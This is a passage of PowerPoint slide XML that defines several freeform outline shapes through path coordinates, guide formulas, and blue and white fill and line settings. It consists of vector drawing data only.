                      <a:pt x="85" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="23"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36253" name="Freeform 386"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3629" y="2513"/>
                <a:ext cx="5" cy="13"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 5"/>
                  <a:gd name="T1" fmla="*/ 5 h 13"/>
                  <a:gd name="T2" fmla="*/ 3 w 5"/>
                  <a:gd name="T3" fmla="*/ 1 h 13"/>
                  <a:gd name="T4" fmla="*/ 4 w 5"/>
                  <a:gd name="T5" fmla="*/ 0 h 13"/>
                  <a:gd name="T6" fmla="*/ 5 w 5"/>
                  <a:gd name="T7" fmla="*/ 6 h 13"/>
                  <a:gd name="T8" fmla="*/ 2 w 5"/>
                  <a:gd name="T9" fmla="*/ 12 h 13"/>
                  <a:gd name="T10" fmla="*/ 1 w 5"/>
                  <a:gd name="T11" fmla="*/ 13 h 13"/>
                  <a:gd name="T12" fmla="*/ 0 w 5"/>
                  <a:gd name="T13" fmla="*/ 13 h 13"/>
                  <a:gd name="T14" fmla="*/ 0 w 5"/>
                  <a:gd name="T15" fmla="*/ 13 h 13"/>
                  <a:gd name="T16" fmla="*/ 0 w 5"/>
                  <a:gd name="T17" fmla="*/ 11 h 13"/>
                  <a:gd name="T18" fmla="*/ 0 w 5"/>
                  <a:gd name="T19" fmla="*/ 9 h 13"/>
                  <a:gd name="T20" fmla="*/ 2 w 5"/>
                  <a:gd name="T21" fmla="*/ 6 h 13"/>
                  <a:gd name="T22" fmla="*/ 1 w 5"/>
                  <a:gd name="T23" fmla="*/ 5 h 1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5"/>
                  <a:gd name="T37" fmla="*/ 0 h 13"/>
                  <a:gd name="T38" fmla="*/ 5 w 5"/>
                  <a:gd name="T39" fmla="*/ 13 h 1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5" h="13">
                    <a:moveTo>
                      <a:pt x="1" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36254" name="Freeform 387"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3561" y="2535"/>
                <a:ext cx="127" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 127"/>
                  <a:gd name="T1" fmla="*/ 3 h 141"/>
                  <a:gd name="T2" fmla="*/ 79 w 127"/>
                  <a:gd name="T3" fmla="*/ 12 h 141"/>
                  <a:gd name="T4" fmla="*/ 90 w 127"/>
                  <a:gd name="T5" fmla="*/ 20 h 141"/>
                  <a:gd name="T6" fmla="*/ 100 w 127"/>
                  <a:gd name="T7" fmla="*/ 25 h 141"/>
                  <a:gd name="T8" fmla="*/ 106 w 127"/>
                  <a:gd name="T9" fmla="*/ 25 h 141"/>
                  <a:gd name="T10" fmla="*/ 115 w 127"/>
                  <a:gd name="T11" fmla="*/ 34 h 141"/>
                  <a:gd name="T12" fmla="*/ 121 w 127"/>
                  <a:gd name="T13" fmla="*/ 42 h 141"/>
                  <a:gd name="T14" fmla="*/ 127 w 127"/>
                  <a:gd name="T15" fmla="*/ 47 h 141"/>
                  <a:gd name="T16" fmla="*/ 118 w 127"/>
                  <a:gd name="T17" fmla="*/ 60 h 141"/>
                  <a:gd name="T18" fmla="*/ 106 w 127"/>
                  <a:gd name="T19" fmla="*/ 78 h 141"/>
                  <a:gd name="T20" fmla="*/ 101 w 127"/>
                  <a:gd name="T21" fmla="*/ 79 h 141"/>
                  <a:gd name="T22" fmla="*/ 97 w 127"/>
                  <a:gd name="T23" fmla="*/ 78 h 141"/>
                  <a:gd name="T24" fmla="*/ 95 w 127"/>
                  <a:gd name="T25" fmla="*/ 91 h 141"/>
                  <a:gd name="T26" fmla="*/ 96 w 127"/>
                  <a:gd name="T27" fmla="*/ 101 h 141"/>
                  <a:gd name="T28" fmla="*/ 85 w 127"/>
                  <a:gd name="T29" fmla="*/ 103 h 141"/>
                  <a:gd name="T30" fmla="*/ 78 w 127"/>
                  <a:gd name="T31" fmla="*/ 107 h 141"/>
                  <a:gd name="T32" fmla="*/ 75 w 127"/>
                  <a:gd name="T33" fmla="*/ 115 h 141"/>
                  <a:gd name="T34" fmla="*/ 71 w 127"/>
                  <a:gd name="T35" fmla="*/ 119 h 141"/>
                  <a:gd name="T36" fmla="*/ 65 w 127"/>
                  <a:gd name="T37" fmla="*/ 120 h 141"/>
                  <a:gd name="T38" fmla="*/ 60 w 127"/>
                  <a:gd name="T39" fmla="*/ 120 h 141"/>
                  <a:gd name="T40" fmla="*/ 55 w 127"/>
                  <a:gd name="T41" fmla="*/ 124 h 141"/>
                  <a:gd name="T42" fmla="*/ 55 w 127"/>
                  <a:gd name="T43" fmla="*/ 131 h 141"/>
                  <a:gd name="T44" fmla="*/ 49 w 127"/>
                  <a:gd name="T45" fmla="*/ 136 h 141"/>
                  <a:gd name="T46" fmla="*/ 41 w 127"/>
                  <a:gd name="T47" fmla="*/ 135 h 141"/>
                  <a:gd name="T48" fmla="*/ 30 w 127"/>
                  <a:gd name="T49" fmla="*/ 137 h 141"/>
                  <a:gd name="T50" fmla="*/ 22 w 127"/>
                  <a:gd name="T51" fmla="*/ 140 h 141"/>
                  <a:gd name="T52" fmla="*/ 18 w 127"/>
                  <a:gd name="T53" fmla="*/ 139 h 141"/>
                  <a:gd name="T54" fmla="*/ 14 w 127"/>
                  <a:gd name="T55" fmla="*/ 131 h 141"/>
                  <a:gd name="T56" fmla="*/ 7 w 127"/>
                  <a:gd name="T57" fmla="*/ 119 h 141"/>
                  <a:gd name="T58" fmla="*/ 1 w 127"/>
                  <a:gd name="T59" fmla="*/ 107 h 141"/>
                  <a:gd name="T60" fmla="*/ 12 w 127"/>
                  <a:gd name="T61" fmla="*/ 96 h 141"/>
                  <a:gd name="T62" fmla="*/ 67 w 127"/>
                  <a:gd name="T63" fmla="*/ 64 h 141"/>
                  <a:gd name="T64" fmla="*/ 62 w 127"/>
                  <a:gd name="T65" fmla="*/ 46 h 141"/>
                  <a:gd name="T66" fmla="*/ 61 w 127"/>
                  <a:gd name="T67" fmla="*/ 29 h 141"/>
                  <a:gd name="T68" fmla="*/ 65 w 127"/>
                  <a:gd name="T69" fmla="*/ 17 h 141"/>
                  <a:gd name="T70" fmla="*/ 66 w 127"/>
                  <a:gd name="T71" fmla="*/ 4 h 141"/>
                  <a:gd name="T72" fmla="*/ 70 w 127"/>
                  <a:gd name="T73" fmla="*/ 1 h 141"/>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27"/>
                  <a:gd name="T112" fmla="*/ 0 h 141"/>
                  <a:gd name="T113" fmla="*/ 127 w 127"/>
                  <a:gd name="T114" fmla="*/ 141 h 141"/>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27" h="141">
                    <a:moveTo>
                      <a:pt x="73" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="1"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36255" name="Freeform 388"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3550" y="2518"/>
                <a:ext cx="84" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 84"/>
                  <a:gd name="T1" fmla="*/ 27 h 67"/>
                  <a:gd name="T2" fmla="*/ 3 w 84"/>
                  <a:gd name="T3" fmla="*/ 27 h 67"/>
                  <a:gd name="T4" fmla="*/ 3 w 84"/>
                  <a:gd name="T5" fmla="*/ 29 h 67"/>
                  <a:gd name="T6" fmla="*/ 5 w 84"/>
                  <a:gd name="T7" fmla="*/ 30 h 67"/>
                  <a:gd name="T8" fmla="*/ 6 w 84"/>
                  <a:gd name="T9" fmla="*/ 31 h 67"/>
                  <a:gd name="T10" fmla="*/ 8 w 84"/>
                  <a:gd name="T11" fmla="*/ 30 h 67"/>
                  <a:gd name="T12" fmla="*/ 7 w 84"/>
                  <a:gd name="T13" fmla="*/ 34 h 67"/>
                  <a:gd name="T14" fmla="*/ 10 w 84"/>
                  <a:gd name="T15" fmla="*/ 34 h 67"/>
                  <a:gd name="T16" fmla="*/ 13 w 84"/>
                  <a:gd name="T17" fmla="*/ 35 h 67"/>
                  <a:gd name="T18" fmla="*/ 18 w 84"/>
                  <a:gd name="T19" fmla="*/ 34 h 67"/>
                  <a:gd name="T20" fmla="*/ 19 w 84"/>
                  <a:gd name="T21" fmla="*/ 32 h 67"/>
                  <a:gd name="T22" fmla="*/ 20 w 84"/>
                  <a:gd name="T23" fmla="*/ 32 h 67"/>
                  <a:gd name="T24" fmla="*/ 22 w 84"/>
                  <a:gd name="T25" fmla="*/ 33 h 67"/>
                  <a:gd name="T26" fmla="*/ 25 w 84"/>
                  <a:gd name="T27" fmla="*/ 33 h 67"/>
                  <a:gd name="T28" fmla="*/ 29 w 84"/>
                  <a:gd name="T29" fmla="*/ 33 h 67"/>
                  <a:gd name="T30" fmla="*/ 31 w 84"/>
                  <a:gd name="T31" fmla="*/ 33 h 67"/>
                  <a:gd name="T32" fmla="*/ 31 w 84"/>
                  <a:gd name="T33" fmla="*/ 32 h 67"/>
                  <a:gd name="T34" fmla="*/ 41 w 84"/>
                  <a:gd name="T35" fmla="*/ 34 h 67"/>
                  <a:gd name="T36" fmla="*/ 46 w 84"/>
                  <a:gd name="T37" fmla="*/ 33 h 67"/>
                  <a:gd name="T38" fmla="*/ 46 w 84"/>
                  <a:gd name="T39" fmla="*/ 31 h 67"/>
                  <a:gd name="T40" fmla="*/ 48 w 84"/>
                  <a:gd name="T41" fmla="*/ 32 h 67"/>
                  <a:gd name="T42" fmla="*/ 50 w 84"/>
                  <a:gd name="T43" fmla="*/ 32 h 67"/>
                  <a:gd name="T44" fmla="*/ 52 w 84"/>
                  <a:gd name="T45" fmla="*/ 31 h 67"/>
                  <a:gd name="T46" fmla="*/ 54 w 84"/>
                  <a:gd name="T47" fmla="*/ 28 h 67"/>
                  <a:gd name="T48" fmla="*/ 55 w 84"/>
                  <a:gd name="T49" fmla="*/ 27 h 67"/>
                  <a:gd name="T50" fmla="*/ 57 w 84"/>
                  <a:gd name="T51" fmla="*/ 23 h 67"/>
                  <a:gd name="T52" fmla="*/ 58 w 84"/>
                  <a:gd name="T53" fmla="*/ 21 h 67"/>
                  <a:gd name="T54" fmla="*/ 63 w 84"/>
                  <a:gd name="T55" fmla="*/ 16 h 67"/>
                  <a:gd name="T56" fmla="*/ 69 w 84"/>
                  <a:gd name="T57" fmla="*/ 9 h 67"/>
                  <a:gd name="T58" fmla="*/ 70 w 84"/>
                  <a:gd name="T59" fmla="*/ 10 h 67"/>
                  <a:gd name="T60" fmla="*/ 72 w 84"/>
                  <a:gd name="T61" fmla="*/ 9 h 67"/>
                  <a:gd name="T62" fmla="*/ 78 w 84"/>
                  <a:gd name="T63" fmla="*/ 3 h 67"/>
                  <a:gd name="T64" fmla="*/ 80 w 84"/>
                  <a:gd name="T65" fmla="*/ 0 h 67"/>
                  <a:gd name="T66" fmla="*/ 81 w 84"/>
                  <a:gd name="T67" fmla="*/ 1 h 67"/>
                  <a:gd name="T68" fmla="*/ 79 w 84"/>
                  <a:gd name="T69" fmla="*/ 4 h 67"/>
                  <a:gd name="T70" fmla="*/ 79 w 84"/>
                  <a:gd name="T71" fmla="*/ 6 h 67"/>
                  <a:gd name="T72" fmla="*/ 79 w 84"/>
                  <a:gd name="T73" fmla="*/ 8 h 67"/>
                  <a:gd name="T74" fmla="*/ 79 w 84"/>
                  <a:gd name="T75" fmla="*/ 8 h 67"/>
                  <a:gd name="T76" fmla="*/ 80 w 84"/>
                  <a:gd name="T77" fmla="*/ 8 h 67"/>
                  <a:gd name="T78" fmla="*/ 83 w 84"/>
                  <a:gd name="T79" fmla="*/ 9 h 67"/>
                  <a:gd name="T80" fmla="*/ 84 w 84"/>
                  <a:gd name="T81" fmla="*/ 11 h 67"/>
                  <a:gd name="T82" fmla="*/ 84 w 84"/>
                  <a:gd name="T83" fmla="*/ 15 h 67"/>
                  <a:gd name="T84" fmla="*/ 84 w 84"/>
                  <a:gd name="T85" fmla="*/ 18 h 67"/>
                  <a:gd name="T86" fmla="*/ 81 w 84"/>
                  <a:gd name="T87" fmla="*/ 18 h 67"/>
                  <a:gd name="T88" fmla="*/ 78 w 84"/>
                  <a:gd name="T89" fmla="*/ 17 h 67"/>
                  <a:gd name="T90" fmla="*/ 77 w 84"/>
                  <a:gd name="T91" fmla="*/ 21 h 67"/>
                  <a:gd name="T92" fmla="*/ 78 w 84"/>
                  <a:gd name="T93" fmla="*/ 31 h 67"/>
                  <a:gd name="T94" fmla="*/ 76 w 84"/>
                  <a:gd name="T95" fmla="*/ 34 h 67"/>
                  <a:gd name="T96" fmla="*/ 72 w 84"/>
                  <a:gd name="T97" fmla="*/ 38 h 67"/>
                  <a:gd name="T98" fmla="*/ 72 w 84"/>
                  <a:gd name="T99" fmla="*/ 46 h 67"/>
                  <a:gd name="T100" fmla="*/ 72 w 84"/>
                  <a:gd name="T101" fmla="*/ 62 h 67"/>
                  <a:gd name="T102" fmla="*/ 73 w 84"/>
                  <a:gd name="T103" fmla="*/ 63 h 67"/>
                  <a:gd name="T104" fmla="*/ 72 w 84"/>
                  <a:gd name="T105" fmla="*/ 64 h 67"/>
                  <a:gd name="T106" fmla="*/ 68 w 84"/>
                  <a:gd name="T107" fmla="*/ 67 h 67"/>
                  <a:gd name="T108" fmla="*/ 62 w 84"/>
                  <a:gd name="T109" fmla="*/ 66 h 67"/>
                  <a:gd name="T110" fmla="*/ 38 w 84"/>
                  <a:gd name="T111" fmla="*/ 63 h 67"/>
                  <a:gd name="T112" fmla="*/ 13 w 84"/>
                  <a:gd name="T113" fmla="*/ 60 h 67"/>
                  <a:gd name="T114" fmla="*/ 11 w 84"/>
                  <a:gd name="T115" fmla="*/ 53 h 67"/>
                  <a:gd name="T116" fmla="*/ 7 w 84"/>
                  <a:gd name="T117" fmla="*/ 44 h 67"/>
                  <a:gd name="T118" fmla="*/ 0 w 84"/>
                  <a:gd name="T119" fmla="*/ 27 h 67"/>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84"/>
                  <a:gd name="T181" fmla="*/ 0 h 67"/>
                  <a:gd name="T182" fmla="*/ 84 w 84"/>
                  <a:gd name="T183" fmla="*/ 67 h 67"/>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84" h="67">
                    <a:moveTo>
                      <a:pt x="0" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="31"/>
